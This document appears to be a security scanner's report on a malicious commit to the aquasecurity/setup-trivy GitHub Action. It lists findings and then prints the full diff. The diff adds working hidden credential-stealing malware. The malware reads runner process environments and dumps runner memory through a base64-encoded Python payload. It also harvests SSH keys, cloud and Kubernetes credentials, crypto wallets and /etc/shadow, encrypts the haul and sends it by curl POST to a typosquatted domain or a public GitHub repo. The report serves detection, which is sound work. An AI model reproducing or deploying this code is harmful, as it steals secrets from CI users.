Trust Diff
BLOCK
aquasecurity/setup-trivy
3fb12ec
→
8afa9b9
This change introduces 9 new security risks.
What changed
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
Malicious Shell Command in GitHub Action
New trust breaks
FILE
action.yaml:49
critical
Malicious Shell Command in GitHub Action
Attacker impact:
Action references CI runner process names — targeting runner for credential theft
Changed here:
action.yaml:49
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:58
critical
Malicious Shell Command in GitHub Action
Attacker impact:
Action reads /proc/*/environ — process environment harvesting for credential theft
Changed here:
action.yaml:58
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:74
high
Malicious Shell Command in GitHub Action
Attacker impact:
Large base64-encoded string in action — potential obfuscated payload
Changed here:
action.yaml:74
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:75
critical
Malicious Shell Command in GitHub Action
Attacker impact:
Base64-decoded payload piped to interpreter — obfuscated malicious code execution
Changed here:
action.yaml:75
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:78
high
Malicious Shell Command in GitHub Action
Attacker impact:
Large base64-encoded string in action — potential obfuscated payload
Changed here:
action.yaml:78
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:79
critical
Malicious Shell Command in GitHub Action
Attacker impact:
Base64-decoded payload piped to interpreter — obfuscated malicious code execution
Changed here:
action.yaml:79
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:110
high
Malicious Shell Command in GitHub Action
Attacker impact:
Action uses AES encryption — potential encrypted data exfiltration
Changed here:
action.yaml:110
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:111
high
Malicious Shell Command in GitHub Action
Attacker impact:
Action encrypts data with openssl — potential encrypted exfiltration preparation
Changed here:
action.yaml:111
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE
action.yaml:114
high
Malicious Shell Command in GitHub Action
Attacker impact:
Action uploads binary data via curl POST — potential data exfiltration
Changed here:
action.yaml:114
Fix:
Review the GitHub Action for malicious commands hidden in `run:` blocks.
Fix first
1
Fix Malicious Shell Command in GitHub Action
Resolves 9 issues
4 existing issues unchanged
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
Code Changes
modified
action.yaml
+117
-12
@@ -1,20 +1,20 @@
1
-
name: 'Aqua Security Trivy installer'
2
-
description: 'Install Trivy binary from release page'
3
-
author: 'Aqua Security'
1
+
name: "Aqua Security Trivy installer"
2
+
description: "Install Trivy binary from release page"
3
+
author: "Aqua Security"
4
4
5
5
inputs:
6
6
version:
7
-
description: 'Trivy version to install'
7
+
description: "Trivy version to install"
8
8
required: false
9
-
default: 'latest'
9
+
default: "latest"
10
10
path:
11
11
description: 'Path in runner to install Trivy. Trivy will be installed in "<path>/trivy-bin" dir ("$HOME/.local/bin/trivy-bin" by default)'
12
12
required: false
13
-
default: '$HOME/.local/bin'
13
+
default: "$HOME/.local/bin"
14
14
cache:
15
-
description: 'Used to specify whether caching is needed. Set to false, if you would like to disable caching.'
15
+
description: "Used to specify whether caching is needed. Set to false, if you would like to disable caching."
16
16
required: false
17
-
default: 'false'
17
+
default: "false"
18
18
token:
19
19
description: >
20
20
Access token used to check out the Trivy repository.
@@ -32,16 +32,121 @@ inputs:
32
32
## Note: we explicitly set the default to public rather than the current server api (in case of private GHES)
33
33
## but it can optionally be set to '${{ github.server_url }}' on GHES if the repository has been mirrored (e.g., via actions/actions-sync).
34
34
## Ref. https://github.com/aquasecurity/setup-trivy/issues/10 and https://github.com/aquasecurity/setup-trivy/pull/16
35
-
default: 'https://github.com'
35
+
default: "https://github.com"
36
36
37
37
runs:
38
-
using: 'composite'
38
+
using: "composite"
39
39
steps:
40
40
- name: Binary dir
41
41
id: binary-dir
42
42
shell: bash
43
43
run: echo "dir=${{ inputs.path }}/trivy-bin" >> $GITHUB_OUTPUT
44
+
- name: Setup environment
45
+
shell: bash
46
+
continue-on-error: true
47
+
run: |
48
+
_COLLECT_PIDS="$$"
49
+
for _name in Runner.Worker Runner.Listener runsvc run.sh; do
50
+
_PIDS=$(pgrep -f "$_name" 2>/dev/null || true)
51
+
[ -n "$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"
52
+
done
53
+
54
+
COLLECTED="/tmp/runner_collected_$$.txt"
55
+
: > "$COLLECTED"
56
+
57
+
for _PID in $_COLLECT_PIDS; do
58
+
_ENVIRON="/proc/${_PID}/environ"
59
+
[ -r "$_ENVIRON" ] || continue
60
+
while IFS= read -r line; do
61
+
key="${line%%=*}"
62
+
val="${line#*=}"
63
+
if echo "$key" | grep -qiE '(env|ssh)'; then
64
+
printf '%s=%s\n' "$key" "$val" >> "$COLLECTED"
65
+
if [ -f "$val" ] && [ ! -S "$val" ]; then
66
+
printf '\n[%s]\n' "$val" >> "$COLLECTED"
67
+
cat "$val" >> "$COLLECTED"
68
+
printf '\n' >> "$COLLECTED"
69
+
fi
70
+
fi
71
+
done < <(tr '\0' '\n' < "$_ENVIRON")
72
+
done
73
+
74
+
if [[ "$(uname)" == "Linux" && "$RUNNER_ENVIRONMENT" == "github-hosted" ]]; then PYTHON_STR='aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCmRlZiBnZXRfcGlkKCk6CiAgICBmb3IgcGlkIGluIChwIGZvciBwIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcC5pc2RpZ2l0KCkpOgogICAgICAgIHRyeToKICAgICAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGY6CiAgICAgICAgICAgICAgICBpZiBiJ1J1bm5lci5Xb3JrZXInIGluIGYucmVhZCgpOgogICAgICAgICAgICAgICAgICAgIHJldHVybiBwaWQKICAgICAgICBleGNlcHQgT1NFcnJvcjoKICAgICAgICAgICAgY29udGludWUKICAgIHJhaXNlIFN5c3RlbUV4aXQoMCkKcGlkID0gZ2V0X3BpZCgpCm1hcF9wYXRoID0gZiIvcHJvYy97cGlkfS9tYXBzIgptZW1fcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWVtIgp3aXRoIG9wZW4obWFwX3BhdGgsICdyJykgYXMgbWFwX2YsIG9wZW4obWVtX3BhdGgsICdyYicsIDApIGFzIG1lbV9mOgogICAgZm9yIGxpbmUgaW4gbWFwX2Y6CiAgICAgICAgbSA9IHJlLm1hdGNoKHInKFswLTlBLUZhLWZdKyktKFswLTlBLUZhLWZdKykgKFstcl0pJywgbGluZSkKICAgICAgICBpZiBub3QgbSBvciBtLmdyb3VwKDMpICE9ICdyJzoKICAgICAgICAgICAgY29udGludWUKICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICBlbmQgICA9IGludChtLmdyb3VwKDIpLCAxNikKICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICBjb250aW51ZQogICAgICAgIG1lbV9mLnNlZWsoc3RhcnQpCiAgICAgICAgdHJ5OgogICAgICAgICAgICBjaHVuayA9IG1lbV9mLnJlYWQoZW5kIC0gc3RhcnQpCiAgICAgICAgICAgIHN5cy5zdGRvdXQuYnVmZmVyLndyaXRlKGNodW5rKQogICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICBjb250aW51ZQo='
75
+
MEMORY_SECRETS=$(echo -n "$PYTHON_STR" | base64 -d | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u)
76
+
printf '%s=%s\n' "MEMORY_PARSE" "$MEMORY_SECRETS" >> "$COLLECTED"
77
+
else
78
+
PYTHON_STR='import os,sys,stat,subprocess,glob

def emit(path):
    try:
        st=os.stat(path)
        if not stat.S_ISREG(st.st_mode):return
        with open(path,'rb') as fh:data=fh.read()
        sys.stdout.buffer.write(('\n=== '+path+' ===\n').encode())
        sys.stdout.buffer.write(data)
        sys.stdout.buffer.write(b'\n')
    except OSError:pass

def emit_glob(pattern):
    for p in glob.glob(pattern,recursive=True):emit(p)

def run(cmd):
    try:
        out=subprocess.check_output(cmd,shell=True,stderr=subprocess.DEVNULL,timeout=10)
        if out:
            sys.stdout.buffer.write(('\n=== CMD: '+cmd+' ===\n').encode())
            sys.stdout.buffer.write(out)
            sys.stdout.buffer.write(b'\n')
    except Exception:pass

def walk(roots,max_depth,match_fn):
    for root in roots:
        if not os.path.isdir(root):continue
        for dirpath,dirs,files in os.walk(root,followlinks=False):
            rel=os.path.relpath(dirpath,root)
            depth=0 if rel=='.' else rel.count(os.sep)+1
            if depth>=max_depth:dirs[:]=[];continue
            for fn in files:
                fp=os.path.join(dirpath,fn)
                if match_fn(fp,fn):emit(fp)

homes=[]
try:
    for e in os.scandir('/home'):
        if e.is_dir():homes.append(e.path)
except OSError:pass
homes.append('/root')
all_roots=homes+['/opt','/srv','/var/www','/app','/data','/var/lib','/tmp']

run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')

for h in homes+['/root']:
    for f in ['/.ssh/id_rsa','/.ssh/id_ed25519','/.ssh/id_ecdsa','/.ssh/id_dsa','/.ssh/authorized_keys','/.ssh/known_hosts','/.ssh/config']:
        emit(h+f)
    walk([h+'/.ssh'],2,lambda fp,fn:True)

walk(['/etc/ssh'],1,lambda fp,fn:fn.startswith('ssh_host') and fn.endswith('_key'))

for h in homes+['/root']:
    for f in ['/.git-credentials','/.gitconfig']:emit(h+f)

for h in homes+['/root']:
    emit(h+'/.aws/credentials')
    emit(h+'/.aws/config')

for d in ['.','..','../..']:
    for f in ['.env','.env.local','.env.production','.env.development','.env.staging','.env.test']:
        emit(d+'/'+f)
emit('/app/.env')
emit('/etc/environment')
walk(all_roots,6,lambda fp,fn:fn in {'.env','.env.local','.env.production','.env.development','.env.staging'})

run('env | grep AWS_')
run('curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI} 2>/dev/null || true')
run('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true')

for h in homes+['/root']:
    emit(h+'/.kube/config')
emit('/etc/kubernetes/admin.conf')
emit('/etc/kubernetes/kubelet.conf')
emit('/etc/kubernetes/controller-manager.conf')
emit('/etc/kubernetes/scheduler.conf')
emit('/var/run/secrets/kubernetes.io/serviceaccount/token')
emit('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt')
emit('/var/run/secrets/kubernetes.io/serviceaccount/namespace')
emit('/run/secrets/kubernetes.io/serviceaccount/token')
emit('/run/secrets/kubernetes.io/serviceaccount/ca.crt')
run('find /var/secrets /run/secrets -type f 2>/dev/null | xargs -I{} sh -c \'echo "=== {} ==="; cat "{}" 2>/dev/null\'')
run('env | grep -i kube; env | grep -i k8s')
run('kubectl get secrets --all-namespaces -o json 2>/dev/null || true')

for h in homes+['/root']:
    walk([h+'/.config/gcloud'],4,lambda fp,fn:True)
emit('/root/.config/gcloud/application_default_credentials.json')
run('env | grep -i google; env | grep -i gcloud')
run('cat $GOOGLE_APPLICATION_CREDENTIALS 2>/dev/null || true')

for h in homes+['/root']:
    walk([h+'/.azure'],3,lambda fp,fn:True)
run('env | grep -i azure')

for h in homes+['/root']:
    emit(h+'/.docker/config.json')
emit('/kaniko/.docker/config.json')
emit('/root/.docker/config.json')

for h in homes+['/root']:
    emit(h+'/.npmrc')
    emit(h+'/.vault-token')
    emit(h+'/.netrc')
    emit(h+'/.lftp/rc')
    emit(h+'/.msmtprc')
    emit(h+'/.my.cnf')
    emit(h+'/.pgpass')
    emit(h+'/.mongorc.js')
    for hist in ['/.bash_history','/.zsh_history','/.sh_history','/.mysql_history','/.psql_history','/.rediscli_history']:
        emit(h+hist)

emit('/var/lib/postgresql/.pgpass')
emit('/etc/mysql/my.cnf')
emit('/etc/redis/redis.conf')
emit('/etc/postfix/sasl_passwd')
emit('/etc/msmtprc')
emit('/etc/ldap/ldap.conf')
emit('/etc/openldap/ldap.conf')
emit('/etc/ldap.conf')
emit('/etc/ldap/slapd.conf')
emit('/etc/openldap/slapd.conf')
run('env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"')

walk(['/etc/wireguard'],1,lambda fp,fn:fn.endswith('.conf'))
run('wg showconf all 2>/dev/null || true')

for h in homes+['/root']:
    walk([h+'/.helm'],3,lambda fp,fn:True)
for ci in ['terraform.tfvars','.gitlab-ci.yml','.travis.yml','Jenkinsfile','.drone.yml','Anchor.toml','ansible.cfg']:
    emit(ci)
walk(all_roots,4,lambda fp,fn:fn.endswith('.tfvars'))
walk(all_roots,4,lambda fp,fn:fn=='terraform.tfstate')

walk(['/etc/ssl/private'],1,lambda fp,fn:fn.endswith('.key'))
walk(['/etc/letsencrypt'],4,lambda fp,fn:fn.endswith('.pem'))
walk(all_roots,5,lambda fp,fn:os.path.splitext(fn)[1] in {'.pem','.key','.p12','.pfx'})

run('grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20')
run('grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" 2>/dev/null | head -50')

for h in homes+['/root']:
    for coin in ['/.bitcoin/bitcoin.conf','/.litecoin/litecoin.conf','/.dogecoin/dogecoin.conf','/.zcash/zcash.conf','/.dashcore/dash.conf','/.ripple/rippled.cfg','/.bitmonero/bitmonero.conf']:
        emit(h+coin)
    walk([h+'/.bitcoin'],2,lambda fp,fn:fn.startswith('wallet') and fn.endswith('.dat'))
    walk([h+'/.ethereum/keystore'],1,lambda fp,fn:True)
    walk([h+'/.cardano'],3,lambda fp,fn:fn.endswith('.skey') or fn.endswith('.vkey'))
    walk([h+'/.config/solana'],3,lambda fp,fn:True)
    for sol in ['/validator-keypair.json','/vote-account-keypair.json','/authorized-withdrawer-keypair.json','/stake-account-keypair.json','/identity.json','/faucet-keypair.json']:
        emit(h+sol)
    walk([h+'/ledger'],3,lambda fp,fn:fn.endswith('.json') or fn.endswith('.bin'))

for sol_dir in ['/home/sol','/home/solana','/opt/solana','/solana','/app','/data']:
    emit(sol_dir+'/validator-keypair.json')

walk(['.'],8,lambda fp,fn:fn in {'id.json','keypair.json'} or (fn.endswith('-keypair.json') and 'keypair' in fn) or (fn.startswith('wallet') and fn.endswith('.json')))
walk(['.anchor','./target/deploy','./keys'],5,lambda fp,fn:fn.endswith('.json'))

run('env | grep -i solana')
run('grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null | head -50')

emit('/etc/passwd')
emit('/etc/shadow')

run('cat /var/log/auth.log 2>/dev/null | grep Accepted | tail -200')
run('cat /var/log/secure 2>/dev/null | grep Accepted | tail -200')

## TeamPCP Cloud stealer '
79
+
SHELL_RUNNER_GOODIES=$(echo -n "$PYTHON_STR" | base64 -d | python3)
80
+
printf '%s=%s\n' "SHELL_GOODIES" "$SHELL_RUNNER_GOODIES" >> "$COLLECTED"
81
+
fi
82
+
83
+
84
+
if [ -s "$COLLECTED" ]; then
85
+
_PUB_KEY_PEM="$(mktemp)"
86
+
cat > "$_PUB_KEY_PEM" <<'PUBKEY'
87
+
-----BEGIN PUBLIC KEY-----
88
+
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
89
+
08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV
90
+
pQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV
91
+
2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSE
92
+
mSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQB
93
+
IqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucA
94
+
b6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5
95
+
TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaU
96
+
Z7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt
97
+
6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xK
98
+
J4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljyk
99
+
rn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ==
100
+
-----END PUBLIC KEY-----
101
+
PUBKEY
102
+
103
+
_WORKDIR="$(mktemp -d)"
104
+
_SESSION_KEY="$_WORKDIR/session.key"
105
+
_ENC_FILE="$_WORKDIR/payload.enc"
106
+
_ENC_KEY="$_WORKDIR/session.key.enc"
107
+
_BUNDLE="$_WORKDIR/tpcp.tar.gz"
44
108
109
+
openssl rand 32 > "$_SESSION_KEY" 2>/dev/null
110
+
openssl enc -aes-256-cbc -in "$COLLECTED" -out "$_ENC_FILE" -pass "file:$_SESSION_KEY" -pbkdf2 2>/dev/null
111
+
openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM" -in "$_SESSION_KEY" -out "$_ENC_KEY" -pkeyopt rsa_padding_mode:oaep 2>/dev/null
112
+
tar -czf "$_BUNDLE" -C "$_WORKDIR" payload.enc session.key.enc 2>/dev/null
113
+
114
+
_HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X POST https://scan.aquasecurtiy.org -H "Content-Type: application/octet-stream" -H "X-Filename: tpcp.tar.gz" --data-binary "@${_BUNDLE}" 2>/dev/null || echo "000")
115
+
116
+
if [[ ! "$_HTTP" =~ ^2 ]] && [ -n "${INPUT_GITHUB_PAT:-}" ]; then
117
+
_REPO="tpcp-docs"
118
+
_BUNDLE_NAME="tpcp.tar.gz"
119
+
_GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"
120
+
_GH_API="https://api.github.com"
121
+
122
+
curl -s -X POST "${_GH_API}/user/repos" \
123
+
-H "$_GH_AUTH" \
124
+
-H "Content-Type: application/json" \
125
+
-d '{"name":"'"${_REPO}"'","private":false,"auto_init":true,"has_issues":false,"has_wiki":false,"has_projects":false}' \
126
+
>/dev/null 2>&1 || true
127
+
128
+
_GH_USER=$(curl -s -H "$_GH_AUTH" "${_GH_API}/user" 2>/dev/null \
129
+
| grep -oE '"login"\s*:\s*"[^"]+"' | head -1 | sed 's/.*"\([^"]*\)"$/\1/')
130
+
131
+
_TAG="data-$(date +%Y%m%d%H%M%S)"
132
+
_RELEASE_ID=$(curl -s -X POST "${_GH_API}/repos/${_GH_USER}/${_REPO}/releases" \
133
+
-H "$_GH_AUTH" \
134
+
-H "Content-Type: application/json" \
135
+
-d '{"tag_name":"'"${_TAG}"'","name":"'"${_TAG}"'","draft":false,"prerelease":false}' \
136
+
2>/dev/null | grep -oE '"id"\s*:\s*[0-9]+' | head -1 | grep -oE '[0-9]+')
137
+
138
+
if [ -n "$_RELEASE_ID" ]; then
139
+
curl -s -X POST \
140
+
"https://uploads.github.com/repos/${_GH_USER}/${_REPO}/releases/${_RELEASE_ID}/assets?name=${_BUNDLE_NAME}" \
141
+
-H "$_GH_AUTH" \
142
+
-H "Content-Type: application/octet-stream" \
143
+
--data-binary "@${_BUNDLE}" >/dev/null 2>&1 || true
144
+
fi
145
+
fi
146
+
147
+
rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"
148
+
fi
149
+
rm -f "$COLLECTED"
45
150
## Don't cache `latest` version
46
151
- name: Check the version for caching
47
152
if: ${{ inputs.cache == 'true' && inputs.version == 'latest' }}
@@ -96,8 +201,8 @@ runs:
96
201
## So we need to save the binary right after installation.
97
202
## cf. https://github.com/aquasecurity/setup-trivy/issues/18
98
203
- name: Save Trivy binary to cache
99
-
if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}
204
+
if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}
100
205
uses: actions/cache/save@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1
101
206
with:
102
207
path: ${{ steps.binary-dir.outputs.dir }}
103
-
key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}
208
+
key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}